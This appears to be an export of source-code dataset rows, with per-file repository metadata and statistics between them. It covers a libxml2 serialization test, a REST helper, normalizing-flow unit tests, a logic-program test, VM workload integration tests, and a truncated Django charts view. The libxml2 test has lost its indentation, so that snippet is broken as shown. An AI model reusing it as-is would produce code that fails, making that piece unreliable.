if str != """<?xml version="1.0" encoding="iso-8859-1"?>
<root>
<foo>hello</foo>
</root>
""":
print "error serializing XML document 4"
sys.exit(1)
#
# Test serializing a subnode
#
root = doc.getRootElement()
str = root.serialize()
if str != """<root><foo>hello</foo></root>""":
print "error serializing XML root 1"
sys.exit(1)
str = root.serialize("iso-8859-1")
if str != """<root><foo>hello</foo></root>""":
print "error serializing XML root 2"
sys.exit(1)
str = root.serialize(format=1)
if str != """<root>
<foo>hello</foo>
</root>""":
print "error serializing XML root 3"
sys.exit(1)
str = root.serialize("iso-8859-1", 1)
if str != """<root>
<foo>hello</foo>
</root>""":
print "error serializing XML root 4"
sys.exit(1)
doc.freeDoc()
#
# Testing HTML document serialization
#
doc = libxml2.htmlParseDoc("""<html><head><title>Hello</title><body><p>hello</body></html>""", None)
str = doc.serialize()
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><head><title>Hello</title></head><body><p>hello</p></body></html>
""":
print "error serializing HTML document 1"
sys.exit(1)
str = doc.serialize("ISO-8859-1")
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Hello</title></head><body><p>hello</p></body></html>
""":
print "error serializing HTML document 2"
sys.exit(1)
str = doc.serialize(format=1)
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>
""":
print "error serializing HTML document 3"
sys.exit(1)
str = doc.serialize("iso-8859-1", 1)
if str != """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>
""":
print "error serializing HTML document 4"
sys.exit(1)
#
# Test serializing a subnode
#
doc.htmlSetMetaEncoding(None)
root = doc.getRootElement()
str = root.serialize()
if str != """<html><head><title>Hello</title></head><body><p>hello</p></body></html>""":
print "error serializing HTML root 1"
sys.exit(1)
str = root.serialize("ISO-8859-1")
if str != """<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Hello</title></head><body><p>hello</p></body></html>""":
print "error serializing HTML root 2"
sys.exit(1)
str = root.serialize(format=1)
if str != """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>""":
print "error serializing HTML root 3"
sys.exit(1)
str = root.serialize("iso-8859-1", 1)
if str != """<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello</title>
</head>
<body><p>hello</p></body>
</html>""":
print "error serializing HTML root 4"
sys.exit(1)
doc.freeDoc()
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
| 28.205298
| 160
| 0.652501
| 656
| 4,259
| 4.23628
| 0.117378
| 0.028787
| 0.120907
| 0.047499
| 0.872976
| 0.847067
| 0.847067
| 0.833393
| 0.804966
| 0.781936
| 0
| 0.043932
| 0.123503
| 4,259
| 150
| 161
| 28.393333
| 0.700509
| 0.044142
| 0
| 0.71875
| 0
| 0.101563
| 0.621055
| 0.197485
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015625
| null | null | 0.140625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
532671b8d65148b87624d7fde0c082cfc30e75b3
| 1,081
|
py
|
Python
|
tests/helper.py
|
LeightonStreet/LingoBarter
|
3fffd95c38973ca9b9ce284070522ba758efe489
|
[
"Apache-2.0"
] | 7
|
2016-01-22T05:01:52.000Z
|
2019-02-07T10:23:12.000Z
|
tests/helper.py
|
LeightonStreet/LeightonStreet
|
3fffd95c38973ca9b9ce284070522ba758efe489
|
[
"Apache-2.0"
] | 6
|
2016-03-26T23:32:47.000Z
|
2016-04-01T07:10:42.000Z
|
tests/helper.py
|
LeightonStreet/LeightonStreet
|
3fffd95c38973ca9b9ce284070522ba758efe489
|
[
"Apache-2.0"
] | 1
|
2016-03-26T23:31:00.000Z
|
2016-03-26T23:31:00.000Z
|
import requests
import json
url_base = "http://localhost:8080/api/v1"
def post(endpoint, auth=None, **kwargs):
headers = {'content-type': 'application/json'}
if auth:
headers['Authentication-Token'] = auth
payload = json.dumps(kwargs)
r = requests.post(url_base + endpoint, data=payload, headers=headers)
print r.text
return r.json()
def get(endpoint, auth=None):
headers = {}
if auth:
headers['Authentication-Token'] = auth
r = requests.get(url_base + endpoint, headers=headers)
print r.text
return r.json()
def put(endpoint, auth=None, **kwargs):
headers = {'content-type': 'application/json'}
if auth:
headers['Authentication-Token'] = auth
payload = json.dumps(kwargs)
r = requests.put(url_base + endpoint, data=payload, headers=headers)
print r.text
return r.json()
def delete(endpoint, auth=None):
headers = {}
if auth:
headers['Authentication-Token'] = auth
r = requests.delete(url_base + endpoint, headers=headers)
print r.text
return r.json()
| 25.139535
| 73
| 0.651249
| 137
| 1,081
| 5.10219
| 0.240876
| 0.050072
| 0.091559
| 0.154506
| 0.874106
| 0.874106
| 0.874106
| 0.874106
| 0.874106
| 0.869814
| 0
| 0.005889
| 0.214616
| 1,081
| 42
| 74
| 25.738095
| 0.817432
| 0
| 0
| 0.666667
| 0
| 0
| 0.151711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.060606
| null | null | 0.121212
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7259e20c21bac0d8747efd22f2970d13a1bb4607
| 4,827
|
py
|
Python
|
neural_spline_flows/nde/transforms/autoregressive_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/autoregressive_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/autoregressive_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
"""Tests for the autoregressive transforms."""
import torch
import unittest
from neural_spline_flows.nde.transforms import autoregressive
from neural_spline_flows.nde.transforms.transform_test import TransformTest
class MaskedAffineAutoregressiveTransformTest(TransformTest):
def test_forward(self):
batch_size = 10
features = 20
inputs = torch.randn(batch_size, features)
for use_residual_blocks, random_mask in [(False, False),
(False, True),
(True, False)]:
with self.subTest(use_residual_blocks=use_residual_blocks,
random_mask=random_mask):
transform = autoregressive.MaskedAffineAutoregressiveTransform(
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=use_residual_blocks,
random_mask=random_mask,
)
outputs, logabsdet = transform(inputs)
self.assert_tensor_is_good(outputs, [batch_size, features])
self.assert_tensor_is_good(logabsdet, [batch_size])
def test_inverse(self):
batch_size = 10
features = 20
inputs = torch.randn(batch_size, features)
for use_residual_blocks, random_mask in [(False, False),
(False, True),
(True, False)]:
with self.subTest(use_residual_blocks=use_residual_blocks,
random_mask=random_mask):
transform = autoregressive.MaskedAffineAutoregressiveTransform(
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=use_residual_blocks,
random_mask=random_mask,
)
outputs, logabsdet = transform.inverse(inputs)
self.assert_tensor_is_good(outputs, [batch_size, features])
self.assert_tensor_is_good(logabsdet, [batch_size])
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.randn(batch_size, features)
self.eps = 1e-6
for use_residual_blocks, random_mask in [(False, False),
(False, True),
(True, False)]:
with self.subTest(use_residual_blocks=use_residual_blocks,
random_mask=random_mask):
transform = autoregressive.MaskedAffineAutoregressiveTransform(
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=use_residual_blocks,
random_mask=random_mask,
)
self.assert_forward_inverse_are_consistent(transform, inputs)
class MaskedPiecewiseLinearAutoregressiveTranformTest(TransformTest):
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.rand(batch_size, features)
self.eps = 1e-3
transform = autoregressive.MaskedPiecewiseLinearAutoregressiveTransform(
num_bins=10,
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=True
)
self.assert_forward_inverse_are_consistent(transform, inputs)
class MaskedPiecewiseQuadraticAutoregressiveTranformTest(TransformTest):
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.rand(batch_size, features)
self.eps = 1e-4
transform = autoregressive.MaskedPiecewiseQuadraticAutoregressiveTransform(
num_bins=10,
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=True
)
self.assert_forward_inverse_are_consistent(transform, inputs)
class MaskedPiecewiseCubicAutoregressiveTranformTest(TransformTest):
def test_forward_inverse_are_consistent(self):
batch_size = 10
features = 20
inputs = torch.rand(batch_size, features)
self.eps = 1e-3
transform = autoregressive.MaskedPiecewiseCubicAutoregressiveTransform(
num_bins=10,
features=features,
hidden_features=30,
num_blocks=5,
use_residual_blocks=True
)
self.assert_forward_inverse_are_consistent(transform, inputs)
if __name__ == '__main__':
unittest.main()
| 37.710938
| 83
| 0.593122
| 432
| 4,827
| 6.300926
| 0.157407
| 0.072741
| 0.112417
| 0.076047
| 0.808597
| 0.808597
| 0.780309
| 0.780309
| 0.780309
| 0.759368
| 0
| 0.017694
| 0.344313
| 4,827
| 127
| 84
| 38.007874
| 0.842338
| 0.008287
| 0
| 0.761905
| 0
| 0
| 0.001673
| 0
| 0
| 0
| 0
| 0
| 0.07619
| 1
| 0.057143
| false
| 0
| 0.038095
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72cbeab123c2f866ce1d76db93cc0446e80628ec
| 429
|
py
|
Python
|
tests/parser/aggregates.count.assignment.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.assignment.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.assignment.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% Atom bug shouldn't be derived, as the body of the rule
% should be false. Auxiliary atoms shouldn't be printed
% out, as they are censored.
d(1).
d(2).
d(3).
bug :- 1 < #count{V : d(V)} <= 2.
"""
output = """
% Atom bug shouldn't be derived, as the body of the rule
% should be false. Auxiliary atoms shouldn't be printed
% out, as they are censored.
d(1).
d(2).
d(3).
bug :- 1 < #count{V : d(V)} <= 2.
"""
| 17.16
| 56
| 0.608392
| 80
| 429
| 3.2625
| 0.35
| 0.122605
| 0.153257
| 0.114943
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0
| 0.029851
| 0.219114
| 429
| 24
| 57
| 17.875
| 0.749254
| 0
| 0
| 0.888889
| 0
| 0
| 0.927739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72e55488c020422bbe099fd9e02bb81a50ee9ef4
| 11,705
|
py
|
Python
|
tests/integration/steps/test_workload.py
|
mike0615/curie
|
e25691f465c23cf53c39be157fcfa2eea4978b26
|
[
"MIT"
] | 4
|
2019-02-26T05:18:13.000Z
|
2020-07-15T00:34:41.000Z
|
tests/integration/steps/test_workload.py
|
nutanix/curie
|
e25691f465c23cf53c39be157fcfa2eea4978b26
|
[
"MIT"
] | 3
|
2021-03-31T18:55:50.000Z
|
2021-04-20T17:13:31.000Z
|
tests/integration/steps/test_workload.py
|
mike0615/curie
|
e25691f465c23cf53c39be157fcfa2eea4978b26
|
[
"MIT"
] | 2
|
2020-01-09T02:24:00.000Z
|
2020-11-04T23:09:02.000Z
|
#
# Copyright (c) 2016 Nutanix Inc. All rights reserved.
#
#
import os
import random
import string
import time
import unittest
import gflags
from curie.exception import CurieTestException
from curie.name_util import NameUtil
from curie.scenario import Scenario
from curie import steps
from curie.vm_group import VMGroup
from curie.workload import Workload
from curie.testing import environment, util
class TestIntegrationStepsWorkload(unittest.TestCase):
_multiprocess_can_split_ = True
def setUp(self):
self.cluster = util.cluster_from_json(gflags.FLAGS.cluster_config_path)
self.cluster.update_metadata(False)
self.group_name = "".join(
[random.choice(string.printable)
for _ in xrange(VMGroup.MAX_NAME_LENGTH)])
self.workload_name = "".join(
[random.choice(string.printable) for _ in xrange(40)])
self.scenario = Scenario(
cluster=self.cluster,
source_directory=os.path.join(environment.resource_dir(), "fio"),
output_directory=environment.test_output_dir(self),
goldimages_directory=gflags.FLAGS.curie_vmdk_goldimages_dir)
self.valid_fio_path = "oltp.fio"
self.invalid_fio_path = "not-a-file.bogus"
def tearDown(self):
test_vms, _ = NameUtil.filter_test_vms(self.cluster.vms(),
[self.scenario.id])
self.cluster.power_off_vms(test_vms)
self.cluster.delete_vms(test_vms)
def test_prefill(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.PrefillStart(self.scenario, self.workload_name)()
def test_prefill_async(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.PrefillStart(self.scenario, self.workload_name,
async=True)()
steps.workload.PrefillWait(self.scenario, self.workload_name)()
def test_prefill_invalid_fio_path(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.invalid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
with self.assertRaises(CurieTestException):
steps.workload.PrefillStart(self.scenario, self.workload_name)()
def test_PrefillRun_default(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.PrefillRun(self.scenario, self.workload_name)()
def test_PrefillRun_invalid_fio_path(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.invalid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
with self.assertRaises(CurieTestException):
steps.workload.PrefillRun(self.scenario, self.workload_name)()
def test_start_default(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.Start(self.scenario, self.workload_name, 30)()
def test_start_async(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
steps.workload.Start(self.scenario, self.workload_name, 30, async=True)()
steps.workload.Wait(self.scenario, self.workload_name)()
def test_invalid_fio_path(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.invalid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
with self.assertRaises(CurieTestException):
steps.workload.Start(self.scenario, self.workload_name, 30)()
def test_wait_after_finish(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 30
steps.workload.Start(self.scenario, self.workload_name, duration_secs)()
steps.workload.Wait(self.scenario, self.workload_name)()
def test_wait_after_stop_test(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 120
# Set should_stop to return False for 15 seconds, and True after that.
self.scenario.should_stop = util.return_until(False, True,
duration_secs / 8)
start_secs = time.time()
steps.workload.Start(self.scenario, self.workload_name, duration_secs)()
total_secs = time.time() - start_secs
self.assertTrue(total_secs < duration_secs)
def test_Stop(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 600
start_secs = time.time()
steps.workload.Start(self.scenario, self.workload_name, duration_secs,
async=True)()
time.sleep(30)
steps.workload.Stop(self.scenario, self.workload_name, duration_secs)()
total_secs = time.time() - start_secs
self.assertTrue(total_secs < duration_secs)
def test_Stop_inaccessible(self):
vmgroup = VMGroup(self.scenario, self.group_name, template="ubuntu1604",
template_type="DISK", count_per_cluster=1,
data_disks=[16, 16, 16, 16, 16, 16])
workload = Workload(test=self.scenario, name=self.workload_name,
vm_group=vmgroup, generator="fio",
config_file=self.valid_fio_path)
self.scenario.vm_groups = {self.group_name: vmgroup}
self.scenario.workloads = {self.workload_name: workload}
steps.vm_group.CloneFromTemplate(self.scenario, self.group_name)()
steps.vm_group.PowerOn(self.scenario, self.group_name)()
duration_secs = 600
start_secs = time.time()
steps.workload.Start(self.scenario, self.workload_name, duration_secs,
async=True)()
time.sleep(30)
steps.vm_group.PowerOff(self.scenario, self.group_name)()
steps.workload.Stop(self.scenario, self.workload_name, duration_secs)()
total_secs = time.time() - start_secs
self.assertTrue(total_secs < duration_secs)
| 50.452586
| 77
| 0.67578
| 1,444
| 11,705
| 5.25554
| 0.088643
| 0.147055
| 0.113849
| 0.102385
| 0.84807
| 0.84807
| 0.84807
| 0.844775
| 0.835683
| 0.82356
| 0
| 0.025393
| 0.21273
| 11,705
| 231
| 78
| 50.670996
| 0.798155
| 0.010337
| 0
| 0.735577
| 0
| 0
| 0.019953
| 0
| 0
| 0
| 0
| 0
| 0.028846
| 0
| null | null | 0
| 0.0625
| null | null | 0.009615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72ea65f135076993cc3ec0ccc3e727454bc26e8e
| 98
|
py
|
Python
|
test_random.py
|
ishmeet-raina/hello-github-actions
|
7a2ac4ac6f222cf737dd757fa725814ab831efc5
|
[
"MIT"
] | null | null | null |
test_random.py
|
ishmeet-raina/hello-github-actions
|
7a2ac4ac6f222cf737dd757fa725814ab831efc5
|
[
"MIT"
] | 4
|
2020-12-21T12:19:24.000Z
|
2020-12-21T13:47:51.000Z
|
test_random.py
|
ishmeet-raina/hello-github-actions
|
7a2ac4ac6f222cf737dd757fa725814ab831efc5
|
[
"MIT"
] | null | null | null |
import pytest
from run_file import random_gen
def test_random_stuff():
assert 1 == random_gen()
| 19.6
| 31
| 0.785714
| 16
| 98
| 4.5
| 0.75
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011905
| 0.142857
| 98
| 4
| 32
| 24.5
| 0.845238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
72f858702bab153f01272ef17911d5270f8d17bd
| 34,718
|
py
|
Python
|
apps/charts/views.py
|
kwarodom/bemoss_web_ui-1
|
6c65c49b8f52bc7d189c9f2391f9098ec0f2dd92
|
[
"Unlicense"
] | null | null | null |
apps/charts/views.py
|
kwarodom/bemoss_web_ui-1
|
6c65c49b8f52bc7d189c9f2391f9098ec0f2dd92
|
[
"Unlicense"
] | null | null | null |
apps/charts/views.py
|
kwarodom/bemoss_web_ui-1
|
6c65c49b8f52bc7d189c9f2391f9098ec0f2dd92
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Copyright (c) 2016, Virginia Tech
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the authors and should not be
interpreted as representing official policies, either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the United States Government. Neither the
United States Government nor the United States Department of Energy, nor Virginia Tech, nor any of their employees,
nor any jurisdiction or organization that has cooperated in the development of these materials, makes any warranty,
express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or represents that its use would not infringe
privately owned rights.
Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or
otherwise does not necessarily constitute or imply its endorsement, recommendation, favoring by the United States
Government or any agency thereof, or Virginia Tech - Advanced Research Institute. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof.
VIRGINIA TECH – ADVANCED RESEARCH INSTITUTE
under Contract DE-EE0006352
#__author__ = "BEMOSS Team"
#__credits__ = ""
#__version__ = "2.0"
#__maintainer__ = "BEMOSS Team"
#__email__ = "aribemoss@gmail.com"
#__website__ = "www.bemoss.org"
#__created__ = "2014-09-12 12:04:50"
#__lastUpdated__ = "2016-03-14 11:23:33"
'''
import json
import datetime
from django.http import HttpResponse
from _utils.page_load_utils import get_device_list_side_navigation
from apps.RTU.models import RTU
from apps.VAV.models import VAV
from apps.alerts.views import get_notifications, general_notifications
from apps.dashboard.models import DeviceMetadata
from apps.lighting.models import Lighting
from apps.smartplug.models import Plugload
from apps.thermostat.models import Thermostat
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.shortcuts import render_to_response
import numpy
import itertools
import os
import sys
sys.path.insert(0,os.path.expanduser('~/workspace/bemoss_os/'))
from bemoss_lib.databases.cassandraAPI.cassandraDB import retrieve
def parse_resultset(variables, data_point, result_set):
x = [[lst[variables.index('time')], lst[variables.index(data_point)]+0.0]
for lst in result_set if lst[variables.index(data_point)] is not None]
if len(x) == 0:
return []
#interleave redundant data to make it step-plot
currentTime = int((datetime.datetime.utcnow()-datetime.datetime(1970,1,1)).total_seconds()*1000)
old = numpy.array(x)
newTime = numpy.append(old[1:,0],currentTime)-1.0 #decrease one millisecond time to arrange for chronological order
newList = numpy.vstack((newTime,old[:,1])).transpose().tolist()
old = old.tolist()
finalResult = list(itertools.chain(*zip(old,newList)))
print 'new things againins'
return finalResult
@login_required(login_url='/login/')
def charts_thermostat(request, mac):
"""Page load definition for thermostat statistics."""
print "inside cassandra view method"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'])
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
device_status = [ob.data_as_json() for ob in Thermostat.objects.filter(thermostat_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
context = update_context(context)
return render_to_response(
'charts/charts_thermostat.html',
{'temperature': rs_temperature, 'heat_setpoint': rs_heat_setpoint, 'cool_setpoint': rs_cool_setpoint,
